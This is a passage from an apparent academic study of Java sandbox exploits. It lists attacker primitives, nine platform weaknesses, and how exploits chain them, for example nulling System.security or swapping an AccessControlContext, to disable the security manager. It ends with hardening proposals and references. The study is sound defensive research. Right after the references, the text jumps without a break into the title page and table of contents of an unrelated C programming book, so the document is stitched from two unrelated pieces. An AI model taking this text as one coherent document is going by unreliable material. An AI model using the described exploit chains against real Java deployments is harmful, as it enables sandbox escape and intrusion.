arbitrary no-argument methods and sets them ac-
cessible
A1 Access to system properties
A2 Load arbitrary classes
A3 Load restricted class
A4 Call arbitrary public methods
A5 Access to arbitrary public method
A6 Access to MethodHandles for arbitrary protected
methods
A7 Use system class to call arbitrary MethodHandles
A8 Get access to declared method of a class
A9 Get access to declared field of a class and set it
accessible
A10 Get access to declared, non-static fields of a serial-
izable class and set them accessible
A11 Read and write value of an arbitrary non-static
field
A12 Get access to declared method of a class and set it
accessible
A13 Get access to public constructors of a class
A14 Define class in a privileged context
A15 Set arbitrary members accessible
A16 Restricted field manipulation
A17 Use system class to call arbitrary static methods
A18 Call arbitrary method in privileged context
A19 Call arbitrary instance method in privileged con-
text
A20 Use system class to call arbitrary methods
A21 Use a system class to call a subset of methods
A22 Instantiate arbitrary objects
A23 Instantiate a subset of restricted classes
A24 Create very large file
A25 Call arbitrary method in trusted method chain
A26 Access to MethodHandle of constructor of private
inner class
A27 Unlimited nesting of Object arrays
Table 1: Overview of the primitives used for exploit
documentation. Helper primitives have an identifier
starting with H, attacker primitives start with A.
Weakness # exploits
Unauthorized use of restricted classes (W5) 32 (52%)
Loading of arbitrary classes (W4) 31 (51%)
Unauth. definition of privil. classes (W6) 31 (51%)
Reflective access to methods and fields (W8) 28 (45%)
Confused deputies (W2) 22 (36%)
Caller sensitivity (W1) 22 (36%)
MethodHandles (W9) 21 (34%)
Serialization and type confusion (W7) 9 (15%)
Privileged code execution (W3) 7 (11%)
Table 2: Overview of the weaknesses we identified
and the number of minimal exploits that use them.
One exploit can use more than one weakness.
RQ1: What are the weaknesses attackers exploit to imple-
ment their attacks?
RQ2: How do attackers combine the weaknesses to attack
vectors?
While RQ1 discusses the weaknesses that exploits abuse
in isolation, RQ2 is dedicated to an analysis of how attack
vectors combine multiple weaknesses.
5.1 RQ1: What are the weaknesses attackers
exploit to implement their attacks?
As can be seen in Table 2, we derived a set of nine weak-
nesses from the full documentation of the 61 minimal ex-
ploits. All weaknesses represent a specific kind of vulnerabil-
ity or functionality used by at least 10% of all exploits. They
are well-suited for providing an overview as they combine
multiple related primitives and implementations. Note that
some primitives are associated with more than one weak-
ness, and that one exploit can make use of more than one
weakness. In the following, we explain in detail how exploits
make use of the nine weaknesses.
W1: Caller sensitivity.
Related primitives: H1, H3, H4, H5
Caller-sensitive methods vary their behavior depending on
their immediate caller, e.g., skip permission checks if only
the immediate caller is trusted. Such methods are abused
by 22 minimal exploits for the following purposes.
•22 exploits use methods, primarily Class.forName , to load
arbitrary classes.
•13 of the former 22 exploits also use caller-sensitive meth-
ods to get reflective access to members of classes, i.e.,
fields, methods, and constructors, they should not be al-
lowed to access.
Caller-sensitive methods are not vulnerabilities by them-
selves, as their behavior is intended. They can only be
abused by malicious code if called through a confused deputy.
Because of this, we modelled all caller-sensitive behavior
abused by exploits as helper primitives. Even though the ac-
tual vulnerabilities are the confused deputies, caller-sensitive
methods significantly increase the attack surface; without
these methods, many confused-deputies that do not explic-
itly elevate privileges would not have to be considered secu-
rity vulnerabilities.1Class A {
2 public Object invoke ( Method m, Object []
args ) {
3 return m. invoke (this , args );
4 }
5 // ...
6}
Listing 3: Simplified example code to illustrate a
confused-deputy vulnerability
In addition to the fact that caller-sensitivity increases
the attack surface, we also consider the entire concept of
caller-sensitivity as counter-intuitive when applied to secu-
rity checks. After all, it grants privileges to callers implicitly,
without those callers being aware of those privileges. An
empirical evaluation of the implications of caller-sensitive
methods on security and API usability is certainly required,
however, we are unaware of published research in this area.
W2: Confused deputies.
Related primitives: A7, A17, A20, A21
Confused deputies that are part of the JCL can be used
by attackers to invoke caller-sensitive methods. Calling a
method through a confused deputy will not allow for bypass-
ing arbitrary permission checks, as it will not elevate priv-
ileges. However, caller-sensitive methods often behave dif-
ferently depending only on the immediate caller, sometimes
even skipping permission checks if the immediate caller is
trusted. Thus, calling certain methods through a system
class can be profitable to an attacker. Out of the 61 min-
imal codes, 22 exploits make use of confused deputies. As
we elaborate in the following, the underlying vulnerabilities
are caused by different issues. Note that some exploits make
use of more than only one confused deputy.
•Ten exploits abuse a confused deputy that allows for call-
ing arbitrary static methods. In nine cases, the vulnerabil-
ity was caused by a trusted class implementing a method
similar to the code in Listing 3. In this example, method
A.invoke receives a Method object by the caller, as well
as call arguments, and then invokes that method using
Method.invoke . The first argument to Method.invoke is
the instance upon which to perform the call. In this ex-
ample, it is always this, i.e., an instance of class A. The
second argument is an array of arguments. Just by re-
viewing this method, it seems impossible for any caller to
useA.invoke to invoke a method outside of class A, as the
first argument to Method.invoke is always this, pointing
to an instance of A. However, this is only true for instance
methods, but not for static methods. If Method.invoke
is called on a static method, the first argument will be
ignored. Attackers can thus use a class like Aas a con-
fused deputy to call arbitrary static methods (including
those of restricted classes). We should consider the im-
plementation of Method.invoke as the actual root cause
of these vulnerabilities, as ignoring arguments is counter-
intuitive and bad style. There are various ways on how to
implement this such as to avoid usability issues.
•Four exploits abuse a defect in the implementation of
MethodHandles. An example for this is presented in List-
ing 2. Untrusted code can use MethodHandle.invoke-
WithArguments as a wrapper to MethodHandle.invoke-
Exact , which will then call the target method. The prob-
lem with this is that caller-sensitive methods invoked this
way will incorrectly determine MethodHandles.invoke-
WithArguments as the immediate caller, instead of the un-
trusted code that actually called invokeWithArguments .
Since invokeWithArguments is declared in a trusted class,
many caller-sensitive methods will skip a permission check
and thus expose sensitive functionality to malicious code.
This problem illustrates how error-prone caller-sensitive
behavior is in practice. Determining the immediate caller
is by no means a trivial lookup on the call stack. The
Java runtime has to skip certain methods of the reflection
API and MethodHandles on the call stack to ensure that
caller-sensitive methods called this way behave exactly as
they would if called immediately.
•Ten exploits abuse confused deputies that were introduced
by various complex vulnerabilities, which only allow for
calling a subset of all methods.
W3: Privileged code execution.
Related primitives: A18, A19, A25
We differentiate between privileged code execution and other
confused deputies. The confused deputies we referred to in
the previous paragraphs allowed untrusted code to route a
call sequence through a system class, such that the immedi-
ate caller of the actual target method would be the trusted
system class, and not the malicious code that triggered the
call sequence. This allows an attacker to profit from caller-
sensitive methods. In contrast, privileged code execution
refers to vulnerabilities that allow an attacker to execute
code in a way that it successfully passes arbitrary permis-
sion checks. This is thus more powerful than the confused-
deputy vulnerabilities we described before, as they are not
dependend on caller-sensitivity.
There are two different ways how exploits achieve privi-
leged code execution:
•Four exploits abuse system classes, that explicitly elevate
privileges, and then call attacker-provided methods with
arbitrary arguments. These vulnerabilities are specific to
the IBM Java platform. Since privilege elevation is done
explicitly, and the implementation of these vulnerabilities
is rather simple, we assume that static analysis can be
used to find instances of this problem.
•Three exploits make use of more complex vulnerabilities to
achieve what is known as trusted method chaining [1]. In
trusted method chaining, malicious code is able to setup a
thread that will eventually execute code that was provided
by the attacker, in such a way, that the malicious code it-
self is not on the call stack. This is possible through, e.g.,
attacker-provided scripts that will be evaluated dynami-
cally by a trusted class. Because the entire call stack of
the running thread only contains trusted system classes,
all permission checks will succeed. A simple proposal to
address this issue systematically is adding the class that
initiates a thread to the beginning of the newly created
thread’s call stack. Whether this is feasible without any
unwanted side effects needs to be properly evaluated.As can be seen from the numbers above, cases of explicit
privileged escalation are rare. While there are only four ex-
ploits in the sample set that abuse vulnerabilities of this
kind, there are more than 20 exploits that abuse confused
deputies caused by the implicit elevation of privilege. This is
indicating that explicit privilege elevation is easier to control
than implicit privilege elevation, however, thorough empiri-
cal studies are needed to investigate this matter further.
W4: Loading of arbitrary classes.
Related primitives: H1, A2, A3, A22, A23
Dynamic classloading is a central security-related feature of
the Java platform. Classloaders in the JCL are supposed
to ensure that all code is only able to load classes that it is
allowed to access. Yet, we find that 31 out of 61 minimal
exploits are able to load classes they should be incapable of
loading.
Most commonly (20 exploits), malicious code abuses a
system class as a confused deputy to invoke a caller-sensitive
method, e.g., Class.forName(String) , which will use the
immediate caller’s defining classloader to load the requested
class. Since in this setting the immediate caller of forName
is a trusted system class, and its defining classloader is the
almighty bootstrap classloader, untrusted code can request
the loading of arbitrary restricted classes. Listing 2 gives an
example. We modeled the various confused-deputy defects
as instances of attacker primitives, and the corresponding
caller-sensitive methods as a helper primitive.
The remaining eleven exploits abuse other security vul-
nerabilities to load or instantiate classes that should be in-
accessible to them. We reviewed those vulnerabilities and
found that the underlying defects are rather diverse. An
example for this is provided in Listing 1. In this example,
the vulnerability is in a trusted class, MBeanInstantiator ,
which simply provides an unrestricted public interface for
loading arbitrary classes. In another case, a complex call
sequence will allow untrusted code to define a custom class
using a special classloader. This special classloader will not
define the class in a privileged context, however, the class-
loader itself allows for loading arbitrary classes. A custom
class, that has been defined this way, can thus simply call
Class.forName , which will use the caller’s defining class-
loader, to load arbitrary classes.
The evaluation of these 31 exploits highlights confused-
deputy defects in combination with caller-sensitivity as a
major issue. There is no inherent reason for why public in-
terfaces for classloading should be caller-sensitive. Remov-
ing them is possible, especially since there are non-caller-
sensitive alternatives, e.g., Class.forName(String, bool-
ean, ClassLoader) . While their immediate removal would
break backward compatibility, one should consider their dep-
recation. The remaining vulnerabilities that allow for arbi-
trary classloading are too diverse to be addressed by a single
solution. To fix them, a major redesign of the classloading
mechanism would be required.
W5: Unauthorized use of restricted classes.
Related primitives: H6, H7, H8, A23
Access to restricted classes greatly contributes to the inse-
curity of the Java platform. In total, 32 out of 61 minimal
exploits make immediate use of at least one restricted class.
Exploits in the sample set use them for one or more of the
following purposes:
•Defining a custom class in a privileged context (used by
22 exploits). This is highly valuable to an attacker, as
it allows for arbitrary code execution. A custom class de-
fined in this way can disable the security manager without
having to bypass any further security checks.
•Accessing fields of non-restricted classes (used by three ex-
ploits). Access to private or protected methods of system
classes violates information hiding and exposes sensitive
functionality to untrusted code.
•Setting specific fields accessible (used by nine exploits).
There are certain vulnerabilities that will provide access
to declared members of a class. However, for untrusted
code to be able to use private fields and methods obtained
this way, they must first be set accessible.
•One exploit is able to instantiate a subset of restricted
classes that can be used for information disclosure.
Note that this does not even include the uses of sun.awt.Sun-
Toolkit , which we treated differently from all the other
restricted classes. While we generally consider primitives
that involve the use of a restricted class as helper primi-
tives, we consider primitives that involve SunToolkit as at-
tacker primitives. The difference is that restricted classes
other than SunToolkit cannot be accessed by untrusted
code without exploiting a security vulnerability, whereas it
was always possible to access SunToolkit without violating
the security model: there is a publicly accessible field of type
java.awt.Toolkit , which is instantiated with a platform-
specific toolkit that in turn extends sun.awt.SunToolkit .
Using Class.getSuperClass then provides access to Sun-
Toolkit .
Instead of using stack inspection, restricted classes are
protected in a capability-based manner. Whenever untrusted
code gets a hold of an instance of a restricted class, it can
use it without having to bypass any further checks. The
heavy usage of restricted classes in the exploit sample set il-
lustrates that this entire concept is very hard to implement
securely. The fact that the number of restricted classes in-
creased significantly over time is a dangerous trend. Even
though the case of SunToolkit is exceptional, it once again
demonstrates how hard it is to protect all instances of re-
stricted classes from being leaked to untrusted code. This is
clearly a major design issue that complicates maintainance
of the Java platform and weakens its security guarantees in
practice. Ideally, the concept of restricted classes and the
capability-based way of protecting them would be dropped
in favor of proper permission checks. A potential alterna-
tive way of dealing with this problem could be the planned
Java Module System [2], which may provide more effective
ways of preventing untrusted code from using certain sensi-
tive functionality. However, the Java Module System is still
under development, and requires extensive security analyses
before it can be considered a solution to the problem we
describe.
W6: Unauthorized definition of privileged classes.
Related primitives: H6, A6, A14
Defining a class in a protection domain that is associated
with all permissions allows for arbitrary code execution.
This is achieved by 31 out of 61 minimal exploits, using
one of the following three ways.•22 exploits use a set of restricted classes to define a custom
class with all privileges. This obviously requires an attack
vector that abuses vulnerabilities to get access to methods
in restricted classes in the first place. Restricted classes
should be changed such that they only define privileged
classes if absolutely needed. Further, such sensitive meth-
ods should be guarded by a proper permission check. It
may be possible to implement these changes even without
breaking backward compatibility, however, this requires
further investigation.
•Two exploits obtain unauthorized access to MethodHan-
dles for arbitrary protected methods. This can be used
to call internal methods of classloaders immediately, thus
bypassing any security checks implemented in publicly ac-
cessible methods.
•Seven exploits abuse other, more complex vulnerabilities
to immediately define custom classes with all permissions.
W7: Serialization issues and type confusion.
Related primitives: A3, A11, A14, A16
Nine minimal exploits make use of either serialization issues,
type confusion, or a combination of the two. As we explain
in the following, the effects of using such vulnerabilities can
be very different.
•Five of the nine exploits make use of serialization issues.
Two of them use a deserialization sequence to instantiate
a custom classloader, which can be used to define a class
with higher privileges. Another exploit uses deserializa-
tion within a custom thread, to have a restricted class be
loaded by the bootstrap classloader.
Two exploits use serialization issues to bypass information
hiding, but in different ways. One of the two exploits, in-
volving CVE-2013-1489, prepares an instance of a system
class in a way that would be impossible when running with
limited privileges. Specifically, it manipulates the value of
a certain private field of that system class, which holds a
bytecode representation of a class that will later be defined
by triggering a specific call sequence. This is profitable,
because the system class will define this custom class in a
namespace that provides access to restricted classes. An
attacker would prepare the instance of that system class
before the actual attack. When the exploit code is to be
deployed, it only contains the serialized object. Deserial-
ization of the manipulated instance is possible even when
running with limited privileges.
The second exploit that uses serialization to bypass infor-
mation hiding uses a custom output stream to leak de-
clared fields of serializable classes, while their instances
are about to be written. This allows for manipulating
private fields of system classes.
•Two exploits use type-confusion vulnerabilities to confuse
a system class with a spoofed class, e.g., AccessControl-
Context and FakeAccessControlContext , to bypass in-
formation hiding. The spoofed class declares similar fields
as the system class, but it uses public modifiers for fields
that are declared as private fields in the system class. Due
to the type confusion, the system will allow untrusted code
to access fields that are actually private.
•Two exploits combine serialization and type confusion to
implement an attack. One of them uses serialization for
similar purposes as the exploit involving CVE-2013-1489.
As explained above, it modifies private fields of a system
class before the actual attack and then only deploys the
serialized object, which can be deserialized by untrusted
code at any time, even though its running with limited
privileges. Next, it uses this system class to confuse a
spoofed classloader with the application classloader, in
order to be able to define a privileged class. The other
exploit uses a custom input stream to perform type con-
fusion during deserialization. As already explained above,
it also uses this to confuse a spoofed class with a system
class, which both declare the same fields, but with differ-
ent visibility modifiers. By this, the exploit gets access to
private fields of system classes.
W8: Reflective access to methods and fields.
Related primitives: H3, H4, H5, H7, H8, H10, A5,
A8, A9, A10, A12, A13, A15
Improper uses of reflection in system classes, and certain
caller-sensitive methods can be used by malicious code to
bypass information hiding. In total, 28 minimal exploits
achieve this by abusing various different vulnerabilities and
helpers.
•16 exploits use a vulnerability that will not only provide
untrusted code access to declared fields or methods of a
class, but also set them accessible. This is very valuable to
an attacker, as it allows for using private members without
requiring another vulnerability. Frequently used defects of
this kind were found in sun.awt.SunToolkit .
•13 exploits use confused deputies to invoke caller-sensitive
methods, such as getDeclaredFields and getDeclared-
Methods injava.lang.Class .
•Twelve exploits abuse restricted classes to access class
members they should not be allowed to access, or set cer-
tain fields accessible.
•13 exploits make use of other issues to access members.
The fact that so many exploits make use of reflection to
circumvent information hiding clearly shows that a reflection
API is hard to implement securely. At this time, we cannot
present a solution to the manifold issues without a significant
redesign that would break backward compatibility.
W9: MethodHandles.
Related primitives: H2, H9, A6, A26
Similar to the reflection API, MethodHandles can be used
to bypass information hiding. While there are certain com-
monalities, there are also interesting differences, as we show
in the following.
•Twelve vulnerabilities abuse a confused deputy to call
MethodHandles.lookup to get a lookup object on behalf of
a system class. Such a lookup object can be used by ma-
licious code to access members that are accessible to the
system class, but that should be inaccessible to untrusted
code. Due to the capability-based design, malicious code
does not have to bypass any security checks to get ac-
cess to class members after the lookup object has been
retrieved from the confused deputy.
Exploit JRE
Single-step 
attackRestricted 
class attackInformation 
hiding attack
Load 
classAccess 
methodsUse class
Confused 
deputyCaller-
sensitive 
methodDedicated 
vulnerabilityDedicated 
vulnerability&
&
Confused 
deputyCaller-
sensitive 
method&Figure 2: Shortened attack tree that illustrates the
three categories of attack vectors we identified.
•Without using any security vulnerabilities, eight exploits
make regular use of MethodHandles.lookup , or Method-
Handles.publicLookup to access members. In most cases,
this is simply done because other vulnerabilities depend on
MethodHandles , as illustrated in Listing 2. In other cases,
however, MethodHandles has been deliberately used as an
alternative to the reflection API, because MethodHandles
can be less strict when it comes to type checking. This is
important for a few rare cases of type confusion. During
testing, we found that using the reflection API to access
members of a confused type resulted in an exception due
to a type mismatch, while using MethodHandles worked
without any errors. While this flexibility of MethodHan-
dles is advertised as a feature, it is also helpful to attack-
ers.
•Three exploits use other vulnerabilities that will provide
untrusted code access to MethodHandles that should be
inaccessible.
5.2 RQ2: How do attackers combine the weak-
nesses to attack vectors?
The entire set of 61 minimal codes implements 33 differ-
ent attack vectors. As explained in Section 4.2, a vector
is a specific combination of primitives. Each primitive is
implemented by specific code sequences, which we call im-
plementations . The total number of vectors is smaller than
the total number of exploits, because two exploits can im-
plement the same vector, i.e., the same set of primitives, but
using differerent implementations.
We evaluated how exploits combine the different primi-
tives to attack vectors and found that there are three dif-
ferent categories of attacks. As illustrated in the attack
tree [16] in Figure 2, these categories are single-step attacks ,
restricted-class attacks , and information-hiding attacks . In
the following, we will describe each category in detail.
The category of single-step attacks comprises 13 of the 33
vectors, implemented by 28 minimal exploits. These vectors
have in common that they are of length one and comprise
only a single attacker primitive that can be used alone to
achieve the final goal. In one exceptional case the exploit
uses an additional helper primitive. All five exploits that
achieve denial of service or information disclosure belong to
this category, as well as the seven exploits that achieve priv-
ileged code execution. Another seven exploits use security
vulnerabilities to immediately define a custom class with
higher privileges, thus achieving full bypass without relying
on any other vulnerabilities. Six exploits perform unautho-
rized manipulation of field values, which can be used alone
for privilege escalation. The remaining two exploits use vul-
nerabilities to get access to MethodHandles for arbitrary pro-
tected methods. These single-step attacks are hard to miti-
gate systematically, as they exploit individual vulnerabilities
of various types in different components.
The category of restricted-class attacks comprises 18 vec-
tors, implemented by 31 exploits. They all make imme-
diate use of a restricted class and combine multiple prim-
itives to achieve a final goal. As illustrated in Figure 2,
most of them comprise three common steps: (a) load re-
stricted class, (b) get access to methods of that restricted
class, (c) use the restricted class by calling its methods.
We found that eleven of those 18 vectors, implemented by
22 exploits, use a combination of a confused deputy and a
caller-sensitive method to achieve step (a) or (b). Conse-
quently, modifying or replacing caller-sensitive methods like
Class.forName(String) ,Class.getDeclaredMethods , and
Class.getDeclaredFields would render 22 out of 61 ex-
ploits infeasible.
In principle, acquiring instances of restricted classes does
not require immediate use of a classloading API, or a confused-
deputy vulnerability. A possible alternative way to get ac-
cess to a restricted class is by retrieving it from a trusted
class, either because it leaks an instance through a public
interface, or because it holds an instance in a private/pro-
tected field, which can be accessed from untrusted code by
means of another vulnerability. An example for such an at-
tack is the exploit that involves CVE-2012-1726. It first uses
a vulnerability to break information hiding, thus getting ac-
cess to private methods. Then, it uses a private method,
Thread.start0 , to start a custom thread in such a way that
this thread can retrieve an instance of SunTookit using de-
serialization. SunToolkit is then used to access the contents
of a private field in a system class, AtomicBoolean.unsafe ,
which holds an instance of sun.misc.Unsafe . Finally, Un-
safe is used to define a class in a privileged context. As can
be seen, this vector does not involve the immediate use of a
classloader or a confused deputy. However, we find that this
is a rare case. Only four exploits that use restricted classes
implement a vector that does not depend on classloading
vulnerabilities or confused deputies.
The third category, information hiding attacks, is the small-
est category and comprises the remaining two vectors, each
implemented by a single exploit. They have in common,
that they both abuse vulnerabilities to break information
hiding. One of the two exploits combines two different vul-
nerabilities to achieve this. One is used to get access to
declared fields of a class, and the other one to set them ac-
cessible. It uses this capability to set the private field Sys-
tem.security tonull, thus disabling all security checks.
The second exploit combines a vulnerability for loading ar-
bitrary classes, with a vulnerability to call arbitrary pub-
lic methods. To implement a full attack, it first creates
an instance of java.beans.Statement , which targets Sys-
tem.setSecurityManager with a null argument. This alone
does not violate the security model and cannot be used
by untrusted code without causing an exception, because
Statement will use the current AccessControlContext to
perform the call, which does not have permission to disable
the security manager. To make use of this statement, theexploit first uses the vulnerability that allows for loading ar-
bitrary classes to load SunToolkit . It then uses the second
vulnerability to call the public method SunToolkit.get-
Field , in order to get access to the private field State-
ment.acc and set it accessible. This private field holds
the instance of the current AccessControlContext , which is
used by Statement to perform the call. The exploit changes
this field’s value such that it holds a reference to another in-
stance of AccessControlContext which has all permissions.
After this modification, the Statement object can be suc-
cessfully used to disable the security manager.
Discussion
Summarizing our findings, we can see that a large number of
exploits benefit from design weaknesses. This includes the
heavy usage of restricted classes, caller-sensitive methods in
combination with confused deputies, as well as the incon-
sistencies between the reflection API and MethodHandles .
There are also single-step attacks, which exploit individual
security vulnerabilities introduced through implementation
errors. However, a proper redesign of the aforementioned
weakness areas, e.g., guarding sensitive functionality in re-
stricted classes with permission checks, and removing caller
sensitivity, could significantly improve the security of the
Java platform in practice.
Some of the weaknesses presented in this paper may also
be relevant to other platforms. The Microsoft .NET Com-
mon Language Runtime also uses stack-based access con-
trol to restrict access to sensitive resources. Consequently,
all weaknesses related to this access control model are po-
tentially relevant to the security of both platforms. This
primarily includes issues with confused deputies (W2) and
privileged code execution (W3).
Certain weaknesses may also be relevant to Android, since
most application code and system service code is written
in Java. For instance, Peles et al. show that serialization
vulnerabilities allow an attacker to execute arbitrary code in
many Android applications and services which could result
in privilege escalation [12].
6. RELATED WORK
To the best of our knowledge, this is the first study on a
large set of Java exploits in which abstractions of exploits are
compared to extract common patterns and point to security
weaknesses of the Java platform.
There are publications describing how Java exploits work
at a very low and technical level. For instance, Fireye de-
scribes four Java vulnerabilities [4] and Oh studied a specific
Java vulnerability that has been widely used for drive-by-
download exploits [3]. Kaspersky Labs provide statistics on
the attacks performed on Java regarding, e.g., the number
of attacks over time, and the distribution of attacks in terms
of geography [10].
Schlumberger et al. designed a tool to automatically de-
tect malicious Java applets [15] using machine learning. Ap-
proaches of this kind require thorough feature selection, and
our analysis of exploits could aid in the selection process.
Mastrangelo et al. studied the usage of sun.misc.Unsafe
in practice [11]. One of their findings is that developers use
it for performance optimization.
Several improvements have been proposed to overcome
limitations of the classical approach to stack-based access
control (SBAC). Abadi and Fournet propose History-Based
Access Control (HBAC), which extends SBAC by not only
considering the methods currently on the call stack, but also
all methods that completed execution before the permis-
sion check has been triggered [5]. Pistoia et al. propose
Information-Based Access Control (IBAC) to improve over
HBAC by properly selecting the methods that are actually
responsible for a certain security-sensitive operation, thus
making permission checks more restrictive and precise [14].
7. CONCLUSION
In this paper, we present a systematic and comprehensive
study of a large body of Java exploit samples. As a first
step, we harvested several online resources, such as exploit
databases and exploit frameworks, which resulted in 87 find-
ings. We reduced these original exploits to the minimal code
needed to actually execute an attack and integrated them
into our dedicated testing framework. Then, we removed
all exploits that were not reproducible from the sample set
and merged multiple instances of the same exploit into one
representation. This resulted in a final set of 61 unique, and
reproducible minimal exploits.
We developed a new meta model specifically for purposes
of analyzing the behavior of a large body of exploits and
used it to document the 61 minimal exploits. Based on this
extensive documentation, we derived a set of nine weak-
nesses which comprise commonly used vulnerabilities and
features of the Java platform, e.g., unauthorized use of re-
stricted classes, arbitrary classloading, caller sensitivity, or
MethodHandles . We explained in detail how attackers bene-
fit from those weaknesses, and how they can be combined to
full attack vectors. We found that there are three different
catogories of attack vectors: (1) single-step attacks (46%),
which exploit just a single vulnerability to achieve their final
goal; (2) restricted class attacks (51%), which make use of a
restricted class and combine multiple primitives to achieve
their goal; and (3) information hiding attacks (3%), which
use a combination of vulnerabilies to break information hid-
ing in order to disable all security checks.
Finally, we proposed ideas for improving the security ar-
chitecture to harden Java against future attacks similar to
the ones observed so far. With this we hope to spawn further
research in this area.
Acknowledgments
The authors wish to thank Marco Pistoia for his construc-
tive feedback and Julian Dolby for providing us with the
IBM JDKs. This work was supported by an Oracle Research
Grant and by the DFG Priority Program 1496 Reliably Se-
cure Software Systems through the project INTERFLOW.
8. REFERENCES
[1] Java trusted method chaining
(cve-2010-0840/zdi-10-056).
http://slightlyrandombrokenthoughts.blogspot.de/
2010/04/java-trusted-method-chaining-cve-2010.html.
[Online; accessed on 22-May-2016].
[2] The state of the module system.
http://openjdk.java.net/projects/jigsaw/spec/sotms/.
[Online; accessed on 22-May-2016].
[3] Recent java exploitation trends and malware.
https://media.blackhat.com/bh-us-12/Briefings/Oh/BHUS12OhRecent Java Exploitation Trends and
Malware WP.pdf, 2012. [Online; accessed on
18-May-2016].
[4] Brewing up trouble: Analyzing four widely exploited
java vulnerabilities. https:
//www.fireeye.com/content/dam/fireeye-www/global/
en/current-threats/pdfs/rpt-java-vulnerabilities.pdf,
2014. [Online; accessed on 18-May-2016].
[5] Martin Abadi and C ́ edric Fournet. Access control
based on execution history. In NDSS , volume 3, pages
107–121, 2003.
[6] Eric Bodden, Andreas Sewe, Jan Sinschek, Hela
Oueslati, and Mira Mezini. Taming reflection: Aiding
static analysis in the presence of reflection and custom
class loaders. In ICSE ’11: International Conference
on Software Engineering , pages 241–250. ACM, May
2011.
[7] Security Exploration. [se-2012-01] broken security fix
in ibm java 7/8.
http://seclists.org/bugtraq/2016/Apr/19, 2016.
[Online; accessed on 17-May-2016].
[8] Security Exploration. [se-2012-01] yet another broken
security fix in ibm java 7/8.
http://seclists.org/fulldisclosure/2016/Apr/43, 2016.
[Online; accessed on 17-May-2016].
[9] Li Gong and Gary Ellison. Inside Java (TM) 2
Platform Security: Architecture, API Design, and
Implementation . Pearson Education, 2003.
[10] Kaspersky Labs. Java under attack – the evolution of
exploits in 2012-2013.
https://securelist.com/analysis/publications/57888/
kaspersky-lab-report-java-under-attack, 2013. [Online;
accessed on 19-May-2016].
[11] Luis Mastrangelo, Luca Ponzanelli, Andrea Mocci,
Michele Lanza, Matthias Hauswirth, and Nathaniel
Nystrom. Use at your own risk: the java unsafe api in
the wild. In Proceedings of the 2015 ACM SIGPLAN
International Conference on Object-Oriented
Programming, Systems, Languages, and Applications ,
pages 695–710. ACM, 2015.
[12] Or Peles and Roee Hay. One class to rule them all:
0-day deserialization vulnerabilities in android. In 9th
USENIX Workshop on Offensive Technologies
(WOOT 15) , 2015.
[13] CP Pfleeger and SL Pfleeger. Security in computing.
4th, 2007.
[14] Marco Pistoia, Anindya Banerjee, and David A
Naumann. Beyond stack inspection: A unified
access-control and information-flow security model. In
2007 IEEE Symposium on Security and Privacy
(SP’07) , pages 149–163. IEEE, 2007.
[15] Johannes Schlumberger, Christopher Kruegel, and
Giovanni Vigna. Jarhead analysis and detection of
malicious java applets. In Proceedings of the 28th
Annual Computer Security Applications Conference ,
pages 249–257. ACM, 2012.
[16] Bruce Schneier. Attack trees. Dr. Dobb’s journal ,
24(12):21–29, 1999.
[17] John Viega, Gary McGraw, Tom Mutdosch, and
Edward W. Felten. Statically scanning java code:
Finding security vulnerabilities. IEEE Software ,
17(5):68–74, 2000.Wizard Code
A View on Low-Level Programming DRAFT VERSION 4
Tuomo Petteri Venäläinen
November 27, 2016
2
Ramblings on hacking low-level and other kinds of code.
Copyright (C) 2008-2012 Tuomo Petteri Venäläinen
Part I
Table of Contents
3

Contents
I Table of Contents 3
II Ideas 13
III Preface 17
1 Forewords 21
1.1 First Things . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
1.1.1 Thank You . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
1.1.2 Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
1.1.3 Goals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
1.1.4 Rationale . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
1.1.5 C Language . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
1.1.5.1 Overview . . . . . . . . . . . . . . . . . . . . . . 23
1.1.5.2 History . . . . . . . . . . . . . . . . . . . . . . . . 23
1.1.5.3 Future . . . . . . . . . . . . . . . . . . . . . . . . 24
1.1.6 KISS Principle . . . . . . . . . . . . . . . . . . . . . . . . . 24
1.1.7 Software Development . . . . . . . . . . . . . . . . . . . . . 25
1.1.8 Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
1.2 Suggested Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
2 Overview 27
IV Notes on C 29
3 C Types 31
3.1 Base Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.2 Size-Specific Types . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
3.2.1 Explicit-Size Types . . . . . . . . . . . . . . . . . . . . . . . 32
3.2.2 Fast Types . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
3.2.3 Least-Width Types . . . . . . . . . . . . . . . . . . . . . . . 33
3.3 Other Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
3.4 Wide-Character Types . . . . . . . . . . . . . . . . . . . . . . . . . 34
3.5 Aggregate Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
3.5.1 Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
3.5.1.1 Examples . . . . . . . . . . . . . . . . . . . . . . 35
5
6 CONTENTS
3.5.2 Unions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.5.3 Bitfields . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.6 Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.6.1 Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.7 typedef . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
3.7.1 Examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
3.8 sizeof . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.8.1 Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.9 offsetof . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.9.1 Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.10 Qualifiers and Storage Class Specifiers . . . . . . . . . . . . . . . . . 39
3.10.1 const . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.10.2 static . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.10.3 extern . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
3.10.4 volatile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
